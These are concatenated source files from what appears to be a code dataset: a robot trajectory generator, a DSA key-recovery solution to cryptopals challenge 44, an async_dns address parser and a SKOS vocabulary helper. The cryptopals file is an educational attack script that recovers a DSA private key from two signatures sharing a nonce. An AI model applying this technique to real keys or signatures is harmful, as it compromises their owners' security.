next_nn_X.extend(s)
# Add the (already normalized) joint velocities to the next input
s_dot = current_output[0][68:100]
next_nn_X.extend(s_dot)
return next_nn_X
def check_robot_stopped(self, next_nn_X: List) -> None:
"""Check whether the robot is stopped (i.e. whether subsequent network inputs are almost identical)."""
# Compute the difference in norm between the current and the next network inputs
nn_X_difference_norm = np.linalg.norm(np.array(self.current_nn_X[0]) - np.array(next_nn_X))
# The robot is considered to be stopped if the difference in norm is lower than a threshold
if nn_X_difference_norm < self.nn_X_difference_norm_threshold:
self.stopped = True
else:
self.stopped = False
def update_autoregression_state(self, next_nn_X: List) -> None:
"""Update the autoregression-relevant information."""
self.current_nn_X = [next_nn_X]
self.current_past_trajectory_base_positions = self.new_past_trajectory_base_positions
self.current_past_trajectory_facing_directions = self.new_past_trajectory_facing_directions
self.current_past_trajectory_base_velocities = self.new_past_trajectory_base_velocities
self.current_facing_direction = self.new_facing_direction
self.current_world_R_facing = self.new_world_R_facing
self.current_base_position = self.new_base_position
self.current_ground_base_position = self.new_ground_base_position
self.current_base_yaw = self.new_base_yaw
    def autoregression_and_blending(self, current_output: np.array, denormalized_current_output: np.array,
                                    quad_bezier: List, facing_dirs: List, base_velocities: List,
                                    world_H_base: np.array, base_H_chest: np.array) -> (List, List, List):
        """Handle the autoregressive usage of the network output blended with the user input from the joystick.

        NOTE: the order of the calls below defines the layout of the next
        network input (base positions, facing directions, base velocities,
        trajectory length, joint positions and velocities) and must not change.
        """
        # Update the bi-dimensional reference frame given by the base position and the facing direction
        self.update_reference_frame(world_H_base=world_H_base, base_H_chest=base_H_chest)
        # Initialize empty next input
        next_nn_X = []
        # Use the base positions in an autoregressive fashion
        next_nn_X, blended_base_positions, future_base_pos_blend_features = \
            self.autoregressive_usage_base_positions(next_nn_X=next_nn_X,
                                                     denormalized_current_output=denormalized_current_output,
                                                     quad_bezier=quad_bezier)
        # Use the facing directions in an autoregressive fashion
        next_nn_X, blended_facing_dirs = \
            self.autoregressive_usage_facing_directions(next_nn_X=next_nn_X,
                                                        denormalized_current_output=denormalized_current_output,
                                                        facing_dirs=facing_dirs)
        # Use the base velocities in an autoregressive fashion
        next_nn_X, blended_base_velocities = \
            self.autoregressive_usage_base_velocities(next_nn_X=next_nn_X,
                                                      denormalized_current_output=denormalized_current_output,
                                                      base_velocities=base_velocities)
        # Use the future trajectory length in an autoregressive fashion
        next_nn_X = self.autoregressive_usage_future_traj_len(next_nn_X=next_nn_X,
                                                              future_base_pos_blend_features=future_base_pos_blend_features)
        # Use the joint positions and velocities in an autoregressive fashion
        next_nn_X = self.autoregressive_usage_joint_positions_and_velocities(next_nn_X, current_output)
        # Check whether the robot is stopped
        self.check_robot_stopped(next_nn_X)
        # Update autoregressive-relevant information for the next iteration
        self.update_autoregression_state(next_nn_X)
        return blended_base_positions, blended_facing_dirs, blended_base_velocities
@dataclass
class TrajectoryGenerator:
    """Class for generating trajectories.

    Facade orchestrating the subcomponents: kinematic computations, storage of
    the generated data, autoregressive usage of the learned model, plotting
    utilities and the learned model itself.
    """
    # Subcomponents of the trajectory generator
    kincomputations: KinematicComputations
    storage: StorageHandler
    autoregression: Autoregression
    plotter: Plotter
    model: LearnedModel
    # Iteration counter and generation rate (time elapsed between two
    # generator iterations, used to timestamp footsteps and posturals)
    iteration: int = 0
    generation_rate: float = 1/50
    @staticmethod
    def build(icub: iCub,
              gazebo: scenario.GazeboSimulator,
              kindyn: kindyncomputations.KinDynComputations,
              storage_path: str,
              training_path: str,
              local_foot_vertices_pos: List,
              initial_nn_X: List,
              initial_past_trajectory_base_pos: List,
              initial_past_trajectory_facing_dirs: List,
              initial_past_trajectory_base_vel: List,
              initial_base_height: List,
              initial_base_yaw: float,
              frontal_base_direction: List,
              frontal_chest_direction: List,
              nominal_DS_duration: float = 0.04,
              difference_position_threshold: float = 0.04,
              difference_height_norm_threshold: float = 0.005,
              base_vel_norm: float = 0.4,
              tau_base_positions: float = 1.5,
              tau_facing_dirs: float = 1.3,
              tau_base_velocities: float = 1.3,
              nn_X_difference_norm_threshold: float = 0.05,
              ellipsoid_forward_axis: float = 1.0,
              ellipsoid_side_axis: float = 0.9,
              ellipsoid_backward_axis: float = 0.6,
              ellipsoid_scaling: float = 0.4) -> "TrajectoryGenerator":
        """Build an instance of TrajectoryGenerator."""
        # Build the kinematic computations handler component
        kincomputations = KinematicComputations.build(kindyn=kindyn,
                                                      local_foot_vertices_pos=local_foot_vertices_pos,
                                                      icub=icub,
                                                      gazebo=gazebo,
                                                      nominal_DS_duration=nominal_DS_duration,
                                                      difference_position_threshold=difference_position_threshold,
                                                      difference_height_norm_threshold=difference_height_norm_threshold)
        # Initialize the support vertex and the support foot
        kincomputations.set_initial_support_vertex_and_support_foot()
        # Build the storage handler component
        storage = StorageHandler.build(storage_path)
        # Build the autoregression handler component
        autoregression = Autoregression.build(training_path=training_path,
                                              initial_nn_X=initial_nn_X,
                                              initial_past_trajectory_base_pos=initial_past_trajectory_base_pos,
                                              initial_past_trajectory_facing_dirs=initial_past_trajectory_facing_dirs,
                                              initial_past_trajectory_base_vel=initial_past_trajectory_base_vel,
                                              initial_base_height=initial_base_height,
                                              initial_base_yaw=initial_base_yaw,
                                              frontal_base_direction=frontal_base_direction,
                                              frontal_chest_direction=frontal_chest_direction,
                                              base_vel_norm=base_vel_norm,
                                              tau_base_positions=tau_base_positions,
                                              tau_facing_dirs=tau_facing_dirs,
                                              tau_base_velocities=tau_base_velocities,
                                              nn_X_difference_norm_threshold=nn_X_difference_norm_threshold)
        # Build the plotter component
        plotter = Plotter.build(ellipsoid_forward_axis=ellipsoid_forward_axis,
                                ellipsoid_side_axis=ellipsoid_side_axis,
                                ellipsoid_backward_axis=ellipsoid_backward_axis,
                                ellipsoid_scaling=ellipsoid_scaling)
        # Build the learned model component
        model = LearnedModel.build(training_path=training_path)
        return TrajectoryGenerator(kincomputations=kincomputations,
                                   storage=storage,
                                   autoregression=autoregression,
                                   plotter=plotter,
                                   model=model)
    def restore_model_and_retrieve_tensors(self, session: tf.Session) -> (tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor):
        """Restore the learned model and retrieve the tensors of interest."""
        # Restore the learned model
        graph = self.model.restore_learned_model(session=session)
        # Retrieve the tensors of interest
        nn_X, nn_keep_prob, output, blending_coefficients = self.model.retrieve_tensors(graph)
        return nn_X, nn_keep_prob, output, blending_coefficients
    def retrieve_network_output_and_blending_coefficients(self, nn_X: tf.Tensor, nn_keep_prob: tf.Tensor, output: tf.Tensor,
                                                          blending_coefficients: tf.Tensor) -> (np.array, np.array, np.array):
        """Retrieve the network output (also denormalized) and the blending coefficients."""
        # Retrieve the network output and the blending coefficients
        current_output, current_blending_coefficients = self.model.evaluate_tensors(nn_X=nn_X,
                                                                                    current_nn_X=self.autoregression.current_nn_X,
                                                                                    nn_keep_prob=nn_keep_prob,
                                                                                    output=output,
                                                                                    blending_coefficients=blending_coefficients)
        # Denormalize the network output using the training-time output statistics
        denormalized_current_output = denormalize(current_output, self.model.Ymean, self.model.Ystd)[0]
        return current_output, denormalized_current_output, current_blending_coefficients
    def apply_joint_positions_and_base_orientation(self, denormalized_current_output: List) -> (List, List):
        """Apply joint positions and base orientation from the output returned by the network."""
        # Extract the new joint positions from the denormalized network output
        joint_positions = np.asarray(denormalized_current_output[36:68])
        # If the robot is stopped, handle unnatural in-place rotations by imposing zero angular base velocity
        if self.autoregression.stopped:
            omega = 0
        else:
            omega = denormalized_current_output[102]
        # Extract the new base orientation from the output by integrating the
        # angular velocity over one generation period
        base_yaw_dot = omega * self.generation_rate
        new_base_yaw = self.autoregression.current_base_yaw + base_yaw_dot
        new_base_rotation = Rotation.from_euler('xyz', [0, 0, new_base_yaw])
        new_base_quaternion = Quaternion.to_wxyz(new_base_rotation.as_quat())
        # Update the base orientation and the joint positions in the robot configuration
        self.kincomputations.reset_robot_configuration(joint_positions=joint_positions,
                                                       base_position=self.autoregression.current_base_position,
                                                       base_quaternion=new_base_quaternion)
        # Update the base orientation and the joint positions in the configuration of the robot visualized in the simulator
        self.kincomputations.reset_visual_robot_configuration(joint_positions=joint_positions,
                                                              base_quaternion=new_base_quaternion)
        # Update the base yaw in the autoregression state
        self.autoregression.new_base_yaw = new_base_yaw
        return joint_positions, new_base_quaternion
    def update_support_vertex_and_support_foot_and_footsteps(self) -> (str, bool):
        """Update the support vertex and the support foot. Handle updates of the footsteps list and of the deactivation
        time of the last footstep."""
        # Update support foot and support vertex while detecting new footsteps and deactivation time updates
        support_foot, update_deactivation_time, update_footsteps_list = self.kincomputations.update_support_vertex_and_support_foot()
        if update_deactivation_time:
            # Define the swing foot (the opposite of the support foot)
            if support_foot == "r_foot":
                swing_foot = "l_foot"
            else:
                swing_foot = "r_foot"
            if self.storage.footsteps[swing_foot]:
                # Update the deactivation time of the last footstep
                self.storage.footsteps[swing_foot][-1]["deactivation_time"] = self.iteration * self.generation_rate
        if update_footsteps_list:
            # Retrieve the information related to the new footstep
            new_footstep = self.kincomputations.footsteps_extractor.create_new_footstep(
                kindyn=self.kincomputations.kindyn,
                support_foot=support_foot,
                activation_time=self.iteration * self.generation_rate)
            # Update the footsteps storage
            self.storage.update_footsteps_storage(support_foot=support_foot, footstep=new_footstep)
        return support_foot, update_footsteps_list
    # NOTE(review): "fasible" is a typo for "feasible"; the name is kept to
    # avoid breaking external callers
    def compute_kinematically_fasible_base_and_update_posturals(self, joint_positions: List,
                                                                base_quaternion: List, controlled_joints: List,
                                                                link_names: List) -> (List, List, List, List):
        """Compute kinematically-feasible base position and retrieve updated posturals."""
        # Compute and apply kinematically-feasible base position
        kinematically_feasible_base_position = \
            self.kincomputations.compute_and_apply_kinematically_feasible_base_position( joint_positions=joint_positions,
                                                                                         base_quaternion=base_quaternion)
        # Retrieve new posturals to be added to the list of posturals
        new_base_postural, new_joints_postural, new_links_postural, new_com_postural = \
            self.kincomputations.postural_extractor.create_new_posturals(base_position=kinematically_feasible_base_position,
                                                                         base_quaternion=base_quaternion,
                                                                         joint_positions=joint_positions,
                                                                         controlled_joints=controlled_joints,
                                                                         kindyn=self.kincomputations.kindyn,
                                                                         link_names=link_names)
        return new_base_postural, new_joints_postural, new_links_postural, new_com_postural
    def retrieve_joystick_inputs(self, input_port: yarp.BufferedPortBottle, quad_bezier: List, base_velocities: List,
                                 facing_dirs: List, raw_data: List) -> (List, List, List, List):
        """Retrieve user-specified joystick inputs received through YARP port."""
        # The joystick input from the user written on the YARP port will contain 3 * 7 * 2 + 4 = 46 values:
        # 0-13 are quad_bezier (x,y)
        # 14-27 are base_velocities (x,y)
        # 28-41 are facing_dirs (x,y)
        # 42-45 are joystick inputs to be stored for future plotting (curr_x, curr_y, curr_z, curr_rz)
        # Read from the input port (non-blocking)
        res = input_port.read(shouldWait=False)
        if res is None:
            if quad_bezier:
                # If the port is empty but the previous joystick inputs are not empty, return them
                return quad_bezier, base_velocities, facing_dirs, raw_data
            else:
                # If the port is empty and the previous joystick inputs are empty, return default values
                default_quad_bezier = [[0, 0] for _ in range(len(self.autoregression.t))]
                default_base_velocities = [[0, 0] for _ in range(len(self.autoregression.t))]
                default_facing_dirs = [[0, 1] for _ in range(len(self.autoregression.t))]
                default_raw_data = [0, 0, 0, -1] # zero motion direction (robot stopped), forward facing direction
                return default_quad_bezier, default_base_velocities, default_facing_dirs, default_raw_data
        else:
            # If the port is not empty, retrieve the new joystick inputs
            new_quad_bezier = []
            new_base_velocities = []
            new_facing_dirs = []
            new_raw_data = []
            # (x,y) pairs: indexes 0-13 -> quad_bezier, 14-27 -> base_velocities, 28-41 -> facing_dirs
            for k in range(0, res.size() - 4, 2):
                coords = [res.get(k).asFloat32(), res.get(k + 1).asFloat32()]
                if k < 14:
                    new_quad_bezier.append(coords)
                elif k < 28:
                    new_base_velocities.append(coords)
                else:
                    new_facing_dirs.append(coords)
            # The last 4 values are the raw joystick data kept for plotting
            for k in range(res.size() - 4, res.size()):
                new_raw_data.append(res.get(k).asFloat32())
            return new_quad_bezier, new_base_velocities, new_facing_dirs, new_raw_data
    def autoregression_and_blending(self, current_output: np.array, denormalized_current_output: np.array, quad_bezier: List,
                                    facing_dirs: List, base_velocities: List) -> (List, List, List):
        """Use the network output in an autoregressive fashion and blend it with the user input.

        Thin wrapper that retrieves the current base and chest transforms and
        delegates to Autoregression.autoregression_and_blending().
        """
        world_H_base = self.kincomputations.kindyn.get_world_base_transform()
        base_H_chest = self.kincomputations.kindyn.get_relative_transform(ref_frame_name="root_link", frame_name="chest")
        # Use the network output in an autoregressive fashion and blend it with the user input
        blended_base_positions, blended_facing_dirs, blended_base_velocities = \
            self.autoregression.autoregression_and_blending(current_output=current_output,
                                                            denormalized_current_output=denormalized_current_output,
                                                            quad_bezier=quad_bezier,
                                                            facing_dirs=facing_dirs,
                                                            base_velocities=base_velocities,
                                                            world_H_base=world_H_base,
                                                            base_H_chest=base_H_chest)
        return blended_base_positions, blended_facing_dirs, blended_base_velocities
    def update_storages_and_save(self, blending_coefficients: List, base_postural: List, joints_postural: List,
                                 links_postural: List, com_postural: List, raw_data: List, quad_bezier: List,
                                 base_velocities: List, facing_dirs: List, save_every_N_iterations: int) -> None:
        """Update the blending coefficients, posturals and joystick input storages and periodically save data."""
        # Update the blending coefficients storage
        self.storage.update_blending_coefficients_storage(blending_coefficients=blending_coefficients)
        # Update the posturals storage
        self.storage.update_posturals_storage(base=base_postural, joints=joints_postural,
                                              links=links_postural, com=com_postural)
        # Update joystick inputs storage
        self.storage.update_joystick_inputs_storage(raw_data=raw_data, quad_bezier=quad_bezier,
                                                    base_velocities=base_velocities, facing_dirs=facing_dirs)
        # Periodically save data
        # NOTE(review): the modulo test also fires at iteration 0 — confirm
        # that saving on the very first iteration is intended
        if self.iteration % save_every_N_iterations == 0:
            # Before saving data, update the footsteps list
            final_deactivation_time = self.iteration * self.generation_rate
            updated_footsteps = self.kincomputations.footsteps_extractor.update_footsteps(
                final_deactivation_time=final_deactivation_time, footsteps=self.storage.footsteps)
            self.storage.replace_footsteps_storage(footsteps=updated_footsteps)
            # Save data
            self.storage.save_data_as_json()
    def update_iteration_counter(self) -> None:
        """Update the counter for the iterations of the generator."""
        # Debug
        print(self.iteration)
        # Wait for user confirmation before starting the actual generation
        # (triggered once, at the second iteration)
        if self.iteration == 1:
            input("\nPress Enter to start the trajectory generation.\n")
        self.iteration += 1
| 1.96875 | 2 |
set6/c44_attack_dsa_repeated_nonce.py | kangtastic/cryptopals | 1 | 12767432 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# DSA nonce recovery from repeated nonce
#
# Cryptanalytic MVP award.
#
# This attack (in an elliptic curve group) broke the PS3. It is a great,
# great attack.
#
# In this file:
#
# https://cryptopals.com/static/challenge-data/44.txt
#
# find a collection of DSA-signed messages. (NB: each msg has a trailing
# space.)
#
# These were signed under the following pubkey:
#
# y = 2d026f4bf30195ede3a088da85e398ef869611d0f68f07
# 13d51c9c1a3a26c95105d915e2d8cdf26d056b86b8a7b8
# 5519b1c23cc3ecdc6062650462e3063bd179c2a6581519
# f674a61f1d89a1fff27171ebc1b93d4dc57bceb7ae2430
# f98a6a4d83d8279ee65d71c1203d2c96d65ebbf7cce9d3
# 2971c3de5084cce04a2e147821
#
# (using the same domain parameters as the previous exercise)
#
# It should not be hard to find the messages for which we have accidentally
# used a repeated "k". Given a pair of such messages, you can discover the "k"
# we used with the following formula:
#
# (m1 - m2)
# k = --------- mod q
# (s1 - s2)
#
# 9th Grade Math: Study It!
#
# If you want to demystify this, work out that equation from the original
# DSA equations.
#
# Basic cyclic group math operations want to screw you.
#
# Remember all this math is mod q; s2 may be larger than s1, for instance,
# which isn't a problem if you're doing the subtraction mod q. If you're
# like me, you'll definitely lose an hour to forgetting a paren or a mod q.
# (And don't forget that modular inverse function!)
#
# What's my private key? Its SHA-1 (from hex) is:
#
# ca8f6f7c66fa362d40760d135b763eb8527d3d52
#
import inspect
import os
import sys
from itertools import combinations
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(inspect.getfile(lambda: 0)))))
from util.dsa import G, P, Q
from util.loader import loader
from util.misc import invmod
from util.sha1 import SHA1
from util.text import from_bytes, to_bytes, to_hexstring
def recover_dsa_privkey(k, r, s, z, p=P, q=Q, g=G):
    """Recover the DSA private key x from a signature with known nonce.

    Given a signature (r, s) over message hash z produced with nonce k,
    the private key is x = ((s*k - z) * r^-1) mod q.

    p and g are accepted for interface symmetry with the other DSA
    exercises but are not needed by the computation itself.

    Returns None when k is not invertible mod q (no valid signature can
    use such a nonce); otherwise returns x.
    """
    # k must be a unit mod q; bail out early on a degenerate nonce.
    if invmod(k, q) is None:
        return None
    return (((((s * k) % q) - z) % q) * invmod(r, q)) % q
def main():
    """Find two DSA signatures sharing a nonce and recover the private key."""
    # NOTE: do not be fooled! Signatures are created using private keys,
    # notwithstanding the (perhaps intentionally misleading?) wording in this
    # and the previous challenge that might imply otherwise.
    lines = loader("44.txt", lambda l: l.rstrip("\n").split(": "))

    # Each record spans four lines: msg, s, r, m (a SHA-1 hex digest).
    # One record's "m" field is wrong in the challenge data, so the hash is
    # recomputed from the message text instead of trusting the file.
    msgs = []
    for start in range(0, len(lines), 4):
        record = lines[start:start + 4]
        text = record[0][1].encode()
        msgs.append({
            "msg": text,
            "s": int(record[1][1]),
            "r": int(record[2][1]),
            "m": from_bytes(SHA1(text).digest()),
        })

    print(f"Loaded {len(msgs)} DSA-signed messages.")
    print("Recovering private key from the first repeated nonce we detect.")

    for msg1, msg2 in combinations(msgs, 2):
        # A repeated nonce k yields an identical r in both signatures.
        if msg1["r"] != msg2["r"]:
            continue
        m1, s1 = msg1["m"], msg1["s"]
        m2, s2 = msg2["m"], msg2["s"]
        # k = (m1 - m2) / (s1 - s2) mod q; then x follows from one signature.
        k = (((m1 - m2) % Q) * invmod(s1 - s2, Q)) % Q
        privkey = recover_dsa_privkey(k, msg1["r"], s1, m1)
        digest = SHA1(to_hexstring(to_bytes(privkey))).hexdigest()
        assert digest == "ca8f6f7c66fa362d40760d135b763eb8527d3d52"
        print()
        print("Recovered key:", privkey)
        break
    else:
        print("Failed to recover key!")
if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C instead of printing a traceback.
        pass
# Output:
#
# Loaded 11 DSA-signed messages.
# Recovering private key from the first repeated nonce we detect.
#
# Recovered key: 1379952329417023174824742221952501647027600451162
#
| 2.390625 | 2 |
async_dns/core/address.py | gera2ld/async_dns | 59 | 12767433 | import socket
from typing import Union
from urllib.parse import urlparse
from . import types
# Public API of this module.
__all__ = [
    'Host',
    'Address',
    'InvalidHost',
    'InvalidIP',
]
class Host:
    """Hostname/port/credentials quadruple parsed from a netloc.

    Accepts another Host (copied), a "user:pass@host:port" string, or a
    (hostname, port) / (hostname, port, username, password) tuple.
    """
    hostname: str
    port: Union[int, None]
    username: Union[str, None]
    password: Union[str, None]

    def __init__(self, netloc):
        if isinstance(netloc, Host):
            self._load_host(netloc)
        elif isinstance(netloc, str):
            self._load_str(netloc)
        else:
            self._load_tuple(netloc)

    def _load_tuple(self, netloc):
        # A 2-tuple carries (hostname, port); a 4-tuple adds credentials.
        if len(netloc) == 2:
            self.hostname, self.port = netloc
            self.username = self.password = None
        else:
            self.hostname, self.port, self.username, self.password = netloc

    def _load_host(self, host):
        self.hostname = host.hostname
        self.port = host.port
        self.username = host.username
        self.password = host.password

    def _load_str(self, netloc: str):
        userinfo, _, host = netloc.rpartition('@')
        if host.startswith('[') and ']' in host:
            # Bracketed IPv6 literal, optionally followed by ":port".
            # Fix: a bare "[addr]" without a port no longer raises ValueError.
            end = host.index(']')
            hostname = host[1:end]
            rest = host[end + 1:]
            port = int(rest[1:]) if rest.startswith(':') else None
        elif host.count(':') == 1:
            # Plain "host:port".
            hostname, _, port = host.rpartition(':')
            port = int(port)
        else:
            # Bare hostname, IPv4, or unbracketed IPv6 (cannot carry a port).
            hostname, port = host, None
        if userinfo:
            username, _, password = userinfo.partition(':')
        else:
            username = password = None
        self.hostname = hostname
        self.port = port
        self.username = username
        self.password = password

    @property
    def host(self):
        """hostname[:port], with IPv6 hostnames wrapped in brackets."""
        host = f'[{self.hostname}]' if ':' in self.hostname else self.hostname
        if self.port:
            host = f'{host}:{self.port}'
        return host

    def __str__(self):
        userinfo = ''
        if self.username:
            userinfo += self.username
            if self.password:
                userinfo += ':' + self.password
            userinfo += '@'
        return userinfo + self.host
class InvalidHost(Exception):
    """Raised when a hostname cannot be parsed or validated."""
    pass
class InvalidIP(Exception):
    """Raised when an IP literal is required but the hostname is not one."""
    pass
def get_ip_type(hostname):
    """Classify *hostname*: types.AAAA for an IPv6 literal, types.A for
    IPv4, or None for a domain name.

    Raises InvalidHost when the name contains ':' but is not valid IPv6.
    """
    if ':' in hostname:
        # Only an IPv6 literal may contain colons.
        try:
            socket.inet_pton(socket.AF_INET6, hostname)
        except OSError:
            raise InvalidHost(hostname)
        return types.AAAA
    try:
        socket.inet_pton(socket.AF_INET, hostname)
    except OSError:
        # Not an IP literal at all: treat as a domain name.
        return None
    return types.A
class Address:
    """A server address: host information plus protocol and optional path."""

    def __init__(self, hostinfo: Host, protocol: str, path: str=None):
        self.hostinfo = hostinfo
        self.protocol = protocol
        self.path = path
        # types.A, types.AAAA, or None (domain name), per get_ip_type().
        self.ip_type = get_ip_type(self.hostinfo.hostname)

    def __str__(self):
        return '{}://{}{}'.format(
            self.protocol or '-', self.hostinfo.host, self.path or '')

    def __eq__(self, other):
        return str(self) == str(other)

    def __repr__(self):
        return str(self)

    def __hash__(self):
        return hash(str(self))

    def copy(self):
        """Return an independent copy of this address."""
        return Address(Host(self.hostinfo), self.protocol, self.path)

    def to_addr(self):
        """Return a (hostname, port) pair suitable for socket APIs."""
        return self.hostinfo.hostname, self.hostinfo.port

    def to_ptr(self):
        """Return the reverse-DNS (PTR) name for an IPv4 address.

        Raises InvalidIP for anything that is not an IPv4 literal.
        """
        if self.ip_type is not types.A:
            raise InvalidIP(self.hostinfo.hostname)
        octets = self.hostinfo.hostname.split('.')
        return '.'.join(reversed(octets)) + '.in-addr.arpa'

    # Well-known default ports per transport scheme.
    default_ports = {
        'tcp': 53,
        'udp': 53,
        'tcps': 853,
        'https': 443,
    }

    @classmethod
    def parse(cls, value, default_protocol=None, allow_domain=False):
        """Parse *value* (str or Address) into an Address.

        Fills in the scheme's default port when none is given. Unless
        *allow_domain* is true, a non-IP hostname raises InvalidHost.
        """
        if isinstance(value, Address):
            return value.copy()
        if '://' not in value:
            # Give urlparse a netloc to work with.
            value = '//' + value
        parsed = urlparse(value, scheme=default_protocol or 'udp')
        hostinfo = Host(parsed.netloc)
        if hostinfo.port is None:
            hostinfo.port = cls.default_ports.get(parsed.scheme, 53)
        address = Address(hostinfo, parsed.scheme, parsed.path)
        if not allow_domain and address.ip_type is None:
            raise InvalidHost(
                hostinfo.hostname,
                'You may pass `allow_domain=True` to allow domain names.')
        return address
| 3.28125 | 3 |
skos/__init__.py | alex-ip/vocview | 0 | 12767434 | <gh_stars>0
from rdflib.namespace import RDF, SKOS, DCTERMS, RDFS, OWL, DC
from rdflib import URIRef, Namespace
import markdown
from flask import url_for
from config import Config
from skos.concept_scheme import ConceptScheme, ConceptSchemeRenderer
from skos.concept import Concept, ConceptRenderer
from skos.register import Register
import helper
from datetime import date
from urllib import parse
# Controlled values
# Controlled codes returned by get_uri_skos_type().
CONCEPT = 0
CONCEPTSCHEME = 1
COLLECTION = 2
# schema.org namespace, used for organisation/person metadata.
SCHEMAORG = Namespace('http://schema.org/')
def list_concepts():
    """Return (uri, label, metadata) triples for every skos:Concept,
    sorted by label."""
    rows = []
    for uri in Config.g.subjects(RDF.type, SKOS.Concept):
        metadata = [
            ('http://purl.org/dc/terms/created', get_created_date(uri)),
            ('http://purl.org/dc/terms/modified', get_modified_date(uri)),
            ('http://www.w3.org/2004/02/skos/core#definition', get_definition(uri)),
            ('http://www.w3.org/2004/02/skos/core#inScheme', get_in_scheme(uri)),
        ]
        rows.append((uri, get_label(uri), metadata))
    return sorted(rows, key=lambda row: row[1])
def list_concept_schemes():
    """Return (uri, label, metadata) triples for every skos:ConceptScheme,
    sorted by label."""
    rows = []
    for uri in Config.g.subjects(RDF.type, SKOS.ConceptScheme):
        metadata = [
            ('http://purl.org/dc/terms/created', get_created_date(uri)),
            ('http://purl.org/dc/terms/modified', get_modified_date(uri)),
            # get_description() already yields a (predicate, text) pair.
            get_description(uri),
        ]
        rows.append((uri, get_label(uri), metadata))
    return sorted(rows, key=lambda row: row[1])
def _split_camel_case_label(label):
new_label = ''
last = 0
for i, letter in enumerate(label):
if letter.isupper():
new_label += ' {}'.format(label[last:i])
last = i
new_label += ' {}'.format(label[last:])
new_label = new_label.strip()
return new_label
def get_label(uri):
    """Return a human-readable label for *uri*.

    Preference order: skos:prefLabel, dcterms:title, rdfs:label. When no
    label triple exists, a label is derived from the URI itself and split
    on camel case.
    """
    # TODO: title() capitalises all words; a post-process should lower-case
    # words such as prepositions and conjunctions.
    for label in Config.g.objects(URIRef(uri), SKOS.prefLabel):
        return label
    for label in Config.g.objects(URIRef(uri), DCTERMS.title):
        return label
    for label in Config.g.objects(URIRef(uri), RDFS.label):
        return label
    # No label triple found: fall back to a label built from the URI.
    # (Removed a dead `label = label` no-op that was here.)
    label = helper.uri_label(uri)
    return _split_camel_case_label(label)
def get_description(uri):
    """Return (predicate, text) for the first description of *uri*,
    preferring dcterms:description over dc:description over rdfs:comment.
    Returns None if no description exists."""
    for predicate in (DCTERMS.description, DC.description, RDFS.comment):
        for text in Config.g.objects(URIRef(uri), predicate):
            return (predicate, text)
def get_definition(uri):
    """Return the first skos:definition of *uri*, or None."""
    return next(iter(Config.g.objects(URIRef(uri), SKOS.definition)), None)
def get_class_types(uri):
    """Return the rdf:type URIs of *uri*, excluding blank nodes and the
    core SKOS classes (which are rendered elsewhere)."""
    skos_core = {
        'http://www.w3.org/2004/02/skos/core#ConceptScheme',
        'http://www.w3.org/2004/02/skos/core#Concept',
        'http://www.w3.org/2004/02/skos/core#Collection',
    }
    class_types = []
    # Loop variable renamed from `type`, which shadowed the builtin.
    for rdf_type in Config.g.objects(URIRef(uri), RDF.type):
        # Only keep URIs (not blank nodes) outside the core SKOS vocabulary.
        if str(rdf_type)[:4] == 'http' and str(rdf_type) not in skos_core:
            class_types.append(rdf_type)
    return class_types
def _sorted_labelled(uri, predicate):
    """Return (resource, label) pairs for every object of *predicate* on
    *uri*, sorted by label."""
    pairs = [(obj, get_label(obj))
             for obj in Config.g.objects(URIRef(uri), predicate)]
    return sorted(pairs, key=lambda pair: pair[1])
def get_narrowers(uri):
    """Return the narrower concepts of *uri* as sorted (uri, label) pairs."""
    return _sorted_labelled(uri, SKOS.narrower)
def get_broaders(uri):
    """Return the broader concepts of *uri* as sorted (uri, label) pairs."""
    return _sorted_labelled(uri, SKOS.broader)
def get_top_concept_of(uri):
    """Return the schemes *uri* is a top concept of, as sorted
    (uri, label) pairs."""
    return _sorted_labelled(uri, SKOS.topConceptOf)
def get_top_concepts(uri):
    """Return the top concepts of scheme *uri* as sorted (uri, label)
    pairs."""
    return _sorted_labelled(uri, SKOS.hasTopConcept)
def get_change_note(uri):
    """Return the first skos:changeNote of *uri*, or None."""
    return next(iter(Config.g.objects(URIRef(uri), SKOS.changeNote)), None)
def get_alt_labels(uri):
    """Return the sorted skos:altLabel values of *uri*."""
    return sorted(Config.g.objects(URIRef(uri), SKOS.altLabel))
def get_created_date(uri):
    """Return dcterms:created as a datetime.date, or None if absent."""
    for raw in Config.g.objects(URIRef(uri), DCTERMS.created):
        parts = raw.split('-')
        # parts[2][:2] drops any time suffix, e.g. "02T10:30:00".
        return date(int(parts[0]), int(parts[1]), int(parts[2][:2]))
def get_modified_date(uri):
    """Return dcterms:modified as a datetime.date, or None if absent."""
    for raw in Config.g.objects(URIRef(uri), DCTERMS.modified):
        parts = raw.split('-')
        # parts[2][:2] drops any time suffix, e.g. "02T10:30:00".
        return date(int(parts[0]), int(parts[1]), int(parts[2][:2]))
def get_uri_skos_type(uri):
    """Return CONCEPTSCHEME, CONCEPT or COLLECTION depending on the SKOS
    class of *uri*, or None if it is none of these."""
    uri = parse.unquote_plus(uri)
    skos_classes = (
        (SKOS.ConceptScheme, CONCEPTSCHEME),
        (SKOS.Concept, CONCEPT),
        (SKOS.Collection, COLLECTION),
    )
    for skos_class, code in skos_classes:
        for _ in Config.g.triples((URIRef(uri), RDF.type, skos_class)):
            return code
    return None
def get_properties(uri):
    """Return ((predicate, predicate_label), value) pairs for every
    statement about *uri* whose predicate is not rendered elsewhere."""
    # Predicates already displayed by dedicated template sections.
    # frozenset gives O(1) membership tests (was a list); the loop variable
    # is renamed so the builtin `property` is no longer shadowed.
    ignore = frozenset([
        # Common
        RDF.type, SKOS.prefLabel, DCTERMS.title, RDFS.label, DCTERMS.description, SKOS.definition, SKOS.changeNote,
        DCTERMS.created, DCTERMS.modified, OWL.sameAs, RDFS.comment, SKOS.altLabel, DCTERMS.bibliographicCitation,
        RDFS.isDefinedBy, DC.description, DCTERMS.creator, DCTERMS.contributor, SCHEMAORG.parentOrganization,
        SCHEMAORG.contactPoint, SCHEMAORG.member, SCHEMAORG.subOrganization, SCHEMAORG.familyName,
        URIRef('http://schema.semantic-web.at/ppt/propagateType'), SCHEMAORG.givenName, SCHEMAORG.honorificPrefix,
        SCHEMAORG.jobTitle, SCHEMAORG.memberOf, URIRef('http://schema.semantic-web.at/ppt/appliedType'),
        # Concept
        SKOS.narrower, SKOS.broader, SKOS.topConceptOf, SKOS.inScheme, SKOS.closeMatch, SKOS.exactMatch,
        # Concept Scheme
        SKOS.hasTopConcept,
    ])
    properties = []
